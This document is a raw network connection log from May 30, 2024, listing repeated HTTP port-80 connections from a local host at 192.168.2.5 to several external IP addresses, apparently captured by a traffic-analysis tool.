May 30, 2024 15:03:14.684226990 CEST	49733	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:14.999464035 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.999480009 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.999492884 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.999838114 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:15.000076056 CEST	49733	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:15.001883984 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:15.002079010 CEST	49733	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:15.008233070 CEST	49733	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:15.590018034 CEST	49733	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:16.610421896 CEST	49734	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:16.615448952 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:16.619286060 CEST	49734	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:16.623153925 CEST	49734	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:16.628130913 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.225328922 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.225344896 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.225354910 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.225366116 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.225375891 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.225385904 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.225394964 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.225404024 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.225415945 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.225425959 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.225590944 CEST	49734	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:17.225590944 CEST	49734	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:17.230546951 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.230559111 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.230570078 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.230827093 CEST	49734	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:17.277956009 CEST	49734	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:17.313919067 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.313942909 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.314172029 CEST	49734	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:17.314902067 CEST	80	49734	162.0.213.94	192.168.2.5
May 30, 2024 15:03:17.315066099 CEST	49734	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:18.136827946 CEST	49734	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:19.156213999 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:19.161163092 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.164233923 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:19.166351080 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:19.171293974 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.171358109 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.839065075 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.839087009 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.839099884 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.839114904 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.839147091 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:19.839179039 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.839188099 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.839202881 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:19.839235067 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:19.839342117 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.839386940 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.839396000 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.839405060 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.839454889 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:19.839454889 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:19.844101906 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.844115973 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.844125986 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.844232082 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:19.844469070 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.844496012 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.844506979 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:19.886749029 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:19.930602074 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.930737019 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.930748940 CEST	80	49735	162.0.213.94	192.168.2.5
May 30, 2024 15:03:19.930859089 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:19.930859089 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:20.668214083 CEST	49735	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:21.689141035 CEST	49736	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:21.694103956 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:21.694190979 CEST	49736	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:21.696469069 CEST	49736	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:21.701312065 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.302012920 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.302031040 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.302069902 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.302093029 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.302105904 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.302114964 CEST	49736	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:22.302129030 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.302141905 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.302151918 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.302225113 CEST	49736	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:22.302263021 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.302282095 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.302289963 CEST	49736	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:22.302335024 CEST	49736	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:22.307001114 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.307045937 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.307055950 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.307140112 CEST	49736	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:22.390954971 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.390969992 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.390980959 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:22.391140938 CEST	49736	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:22.394284964 CEST	49736	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:22.399112940 CEST	80	49736	162.0.213.94	192.168.2.5
May 30, 2024 15:03:27.969064951 CEST	49737	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:27.974087000 CEST	80	49737	172.82.177.221	192.168.2.5
May 30, 2024 15:03:27.974153996 CEST	49737	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:27.976839066 CEST	49737	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:27.981736898 CEST	80	49737	172.82.177.221	192.168.2.5
May 30, 2024 15:03:29.484169006 CEST	49737	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:29.489840984 CEST	80	49737	172.82.177.221	192.168.2.5
May 30, 2024 15:03:29.496175051 CEST	49737	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:30.499094963 CEST	49738	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:30.504053116 CEST	80	49738	172.82.177.221	192.168.2.5
May 30, 2024 15:03:30.504162073 CEST	49738	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:30.506002903 CEST	49738	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:30.510884047 CEST	80	49738	172.82.177.221	192.168.2.5
May 30, 2024 15:03:32.011934042 CEST	49738	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:32.017633915 CEST	80	49738	172.82.177.221	192.168.2.5
May 30, 2024 15:03:32.017715931 CEST	49738	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:33.032160997 CEST	49739	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:33.037141085 CEST	80	49739	172.82.177.221	192.168.2.5
May 30, 2024 15:03:33.037580013 CEST	49739	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:33.039268970 CEST	49739	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:33.044197083 CEST	80	49739	172.82.177.221	192.168.2.5
May 30, 2024 15:03:33.044286013 CEST	80	49739	172.82.177.221	192.168.2.5
May 30, 2024 15:03:34.543045044 CEST	49739	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:34.548407078 CEST	80	49739	172.82.177.221	192.168.2.5
May 30, 2024 15:03:34.548537016 CEST	49739	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:35.564152956 CEST	49740	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:35.569390059 CEST	80	49740	172.82.177.221	192.168.2.5
May 30, 2024 15:03:35.572196960 CEST	49740	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:35.574702978 CEST	49740	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:35.579610109 CEST	80	49740	172.82.177.221	192.168.2.5
May 30, 2024 15:03:36.170874119 CEST	80	49740	172.82.177.221	192.168.2.5
May 30, 2024 15:03:36.170908928 CEST	80	49740	172.82.177.221	192.168.2.5
May 30, 2024 15:03:36.171068907 CEST	49740	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:36.174256086 CEST	49740	80	192.168.2.5	172.82.177.221
May 30, 2024 15:03:36.179138899 CEST	80	49740	172.82.177.221	192.168.2.5
May 30, 2024 15:03:41.704509020 CEST	49741	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:41.709485054 CEST	80	49741	15.204.0.108	192.168.2.5
May 30, 2024 15:03:41.709558010 CEST	49741	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:41.711791039 CEST	49741	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:41.716767073 CEST	80	49741	15.204.0.108	192.168.2.5
May 30, 2024 15:03:42.312052011 CEST	80	49741	15.204.0.108	192.168.2.5
May 30, 2024 15:03:42.312076092 CEST	80	49741	15.204.0.108	192.168.2.5
May 30, 2024 15:03:42.312094927 CEST	80	49741	15.204.0.108	192.168.2.5
May 30, 2024 15:03:42.312146902 CEST	49741	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:43.215306044 CEST	49741	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:44.233922005 CEST	49742	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:44.238886118 CEST	80	49742	15.204.0.108	192.168.2.5
May 30, 2024 15:03:44.239015102 CEST	49742	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:44.240921974 CEST	49742	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:44.245809078 CEST	80	49742	15.204.0.108	192.168.2.5
May 30, 2024 15:03:44.838265896 CEST	80	49742	15.204.0.108	192.168.2.5
May 30, 2024 15:03:44.838293076 CEST	80	49742	15.204.0.108	192.168.2.5
May 30, 2024 15:03:44.838306904 CEST	80	49742	15.204.0.108	192.168.2.5
May 30, 2024 15:03:44.838370085 CEST	49742	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:44.838581085 CEST	49742	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:45.746171951 CEST	49742	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:46.773957014 CEST	49743	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:46.779300928 CEST	80	49743	15.204.0.108	192.168.2.5
May 30, 2024 15:03:46.779573917 CEST	49743	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:46.782613039 CEST	49743	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:46.787719965 CEST	80	49743	15.204.0.108	192.168.2.5
May 30, 2024 15:03:46.787841082 CEST	80	49743	15.204.0.108	192.168.2.5
May 30, 2024 15:03:47.403340101 CEST	80	49743	15.204.0.108	192.168.2.5
May 30, 2024 15:03:47.403354883 CEST	80	49743	15.204.0.108	192.168.2.5
May 30, 2024 15:03:47.403440952 CEST	49743	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:47.403455019 CEST	80	49743	15.204.0.108	192.168.2.5
May 30, 2024 15:03:47.404268980 CEST	49743	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:48.293428898 CEST	49743	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:49.311438084 CEST	49744	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:49.316390038 CEST	80	49744	15.204.0.108	192.168.2.5
May 30, 2024 15:03:49.316500902 CEST	49744	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:49.320168018 CEST	49744	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:49.325014114 CEST	80	49744	15.204.0.108	192.168.2.5
May 30, 2024 15:03:49.988275051 CEST	80	49744	15.204.0.108	192.168.2.5
May 30, 2024 15:03:49.988296032 CEST	80	49744	15.204.0.108	192.168.2.5
May 30, 2024 15:03:49.988308907 CEST	80	49744	15.204.0.108	192.168.2.5
May 30, 2024 15:03:49.988320112 CEST	80	49744	15.204.0.108	192.168.2.5
May 30, 2024 15:03:49.988471985 CEST	49744	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:49.991390944 CEST	49744	80	192.168.2.5	15.204.0.108
May 30, 2024 15:03:49.996277094 CEST	80	49744	15.204.0.108	192.168.2.5
May 30, 2024 15:04:05.252178907 CEST	49745	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:05.257302046 CEST	80	49745	194.9.94.86	192.168.2.5
May 30, 2024 15:04:05.260308981 CEST	49745	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:05.262156010 CEST	49745	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:05.267136097 CEST	80	49745	194.9.94.86	192.168.2.5
May 30, 2024 15:04:05.937280893 CEST	80	49745	194.9.94.86	192.168.2.5
May 30, 2024 15:04:05.937374115 CEST	80	49745	194.9.94.86	192.168.2.5
May 30, 2024 15:04:05.937407970 CEST	80	49745	194.9.94.86	192.168.2.5
May 30, 2024 15:04:05.937432051 CEST	49745	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:05.937460899 CEST	80	49745	194.9.94.86	192.168.2.5
May 30, 2024 15:04:05.937494993 CEST	80	49745	194.9.94.86	192.168.2.5
May 30, 2024 15:04:05.937510967 CEST	49745	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:05.937532902 CEST	80	49745	194.9.94.86	192.168.2.5
May 30, 2024 15:04:05.937561989 CEST	80	49745	194.9.94.86	192.168.2.5
May 30, 2024 15:04:05.937577009 CEST	49745	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:05.937599897 CEST	80	49745	194.9.94.86	192.168.2.5
May 30, 2024 15:04:05.937650919 CEST	49745	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:06.777378082 CEST	49745	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:07.796716928 CEST	49746	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:07.802187920 CEST	80	49746	194.9.94.86	192.168.2.5
May 30, 2024 15:04:07.802294016 CEST	49746	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:07.804661989 CEST	49746	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:07.809972048 CEST	80	49746	194.9.94.86	192.168.2.5
May 30, 2024 15:04:08.465626001 CEST	80	49746	194.9.94.86	192.168.2.5
May 30, 2024 15:04:08.465656996 CEST	80	49746	194.9.94.86	192.168.2.5
May 30, 2024 15:04:08.465667009 CEST	80	49746	194.9.94.86	192.168.2.5
May 30, 2024 15:04:08.465676069 CEST	80	49746	194.9.94.86	192.168.2.5
May 30, 2024 15:04:08.465687990 CEST	80	49746	194.9.94.86	192.168.2.5
May 30, 2024 15:04:08.465712070 CEST	49746	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:08.465738058 CEST	49746	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:08.466672897 CEST	80	49746	194.9.94.86	192.168.2.5
May 30, 2024 15:04:08.466715097 CEST	49746	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:09.308803082 CEST	49746	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:10.328604937 CEST	49747	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:10.337634087 CEST	80	49747	194.9.94.86	192.168.2.5
May 30, 2024 15:04:10.337711096 CEST	49747	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:10.340210915 CEST	49747	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:10.345593929 CEST	80	49747	194.9.94.86	192.168.2.5
May 30, 2024 15:04:10.345613003 CEST	80	49747	194.9.94.86	192.168.2.5
May 30, 2024 15:04:11.000962019 CEST	80	49747	194.9.94.86	192.168.2.5
May 30, 2024 15:04:11.001014948 CEST	80	49747	194.9.94.86	192.168.2.5
May 30, 2024 15:04:11.001054049 CEST	80	49747	194.9.94.86	192.168.2.5
May 30, 2024 15:04:11.001090050 CEST	80	49747	194.9.94.86	192.168.2.5
May 30, 2024 15:04:11.001123905 CEST	80	49747	194.9.94.86	192.168.2.5
May 30, 2024 15:04:11.001162052 CEST	80	49747	194.9.94.86	192.168.2.5
May 30, 2024 15:04:11.001209021 CEST	49747	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:11.001306057 CEST	49747	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:11.001823902 CEST	80	49747	194.9.94.86	192.168.2.5
May 30, 2024 15:04:11.001946926 CEST	49747	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:11.855737925 CEST	49747	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:12.876178026 CEST	49748	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:12.881470919 CEST	80	49748	194.9.94.86	192.168.2.5
May 30, 2024 15:04:12.881608963 CEST	49748	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:12.883534908 CEST	49748	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:12.888478994 CEST	80	49748	194.9.94.86	192.168.2.5
May 30, 2024 15:04:13.532954931 CEST	80	49748	194.9.94.86	192.168.2.5
May 30, 2024 15:04:13.533001900 CEST	80	49748	194.9.94.86	192.168.2.5
May 30, 2024 15:04:13.533018112 CEST	80	49748	194.9.94.86	192.168.2.5
May 30, 2024 15:04:13.533035994 CEST	80	49748	194.9.94.86	192.168.2.5
May 30, 2024 15:04:13.533051968 CEST	80	49748	194.9.94.86	192.168.2.5
May 30, 2024 15:04:13.533067942 CEST	80	49748	194.9.94.86	192.168.2.5
May 30, 2024 15:04:13.533149004 CEST	80	49748	194.9.94.86	192.168.2.5
May 30, 2024 15:04:13.533178091 CEST	49748	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:13.533236027 CEST	49748	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:13.533236027 CEST	49748	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:13.540179014 CEST	49748	80	192.168.2.5	194.9.94.86
May 30, 2024 15:04:13.545090914 CEST	80	49748	194.9.94.86	192.168.2.5
May 30, 2024 15:04:18.595982075 CEST	49749	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:18.601006985 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:18.601089001 CEST	49749	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:18.617047071 CEST	49749	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:18.622020006 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.218664885 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.218682051 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.218836069 CEST	49749	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:19.219213963 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.219275951 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.219306946 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.219324112 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.219333887 CEST	49749	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:19.219341993 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.219352007 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.219362020 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.219372034 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.219384909 CEST	49749	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:19.219450951 CEST	49749	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:19.223807096 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.223841906 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.223881006 CEST	80	49749	35.214.235.206	192.168.2.5
May 30, 2024 15:04:19.224176884 CEST	49749	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:20.121248007 CEST	49749	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:21.145591974 CEST	49750	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:21.150600910 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.150794983 CEST	49750	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:21.152966976 CEST	49750	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:21.157943010 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.775486946 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.775501966 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.775530100 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.775542021 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.775551081 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.775559902 CEST	49750	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:21.775573969 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.775584936 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.775593996 CEST	49750	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:21.775602102 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.775607109 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.775613070 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.775656939 CEST	49750	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:21.775777102 CEST	49750	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:21.780493975 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.780520916 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.780534983 CEST	80	49750	35.214.235.206	192.168.2.5
May 30, 2024 15:04:21.780564070 CEST	49750	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:21.780590057 CEST	49750	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:22.671093941 CEST	49750	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:23.687722921 CEST	49751	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:23.955686092 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:23.955763102 CEST	49751	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:23.958395958 CEST	49751	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:23.963437080 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:23.963530064 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.576562881 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.576607943 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.576622963 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.576647997 CEST	49751	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:24.576653004 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.576690912 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.576708078 CEST	49751	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:24.576738119 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.576752901 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.576776028 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.576792002 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.576807976 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.576809883 CEST	49751	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:24.576809883 CEST	49751	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:24.576980114 CEST	49751	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:24.581887007 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.581932068 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.582114935 CEST	80	49751	35.214.235.206	192.168.2.5
May 30, 2024 15:04:24.582165003 CEST	49751	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:24.582165956 CEST	49751	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:25.468182087 CEST	49751	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:26.483453989 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:26.488745928 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:26.488913059 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:26.490746021 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:26.495702982 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.108031988 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.108058929 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.108077049 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.108103991 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.108123064 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.108163118 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.108180046 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.108213902 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.108228922 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.108246088 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.108257055 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.108257055 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.108299017 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.108463049 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.113328934 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.113367081 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.113380909 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.114326954 CEST	49752	80	192.168.2.5	35.214.235.206
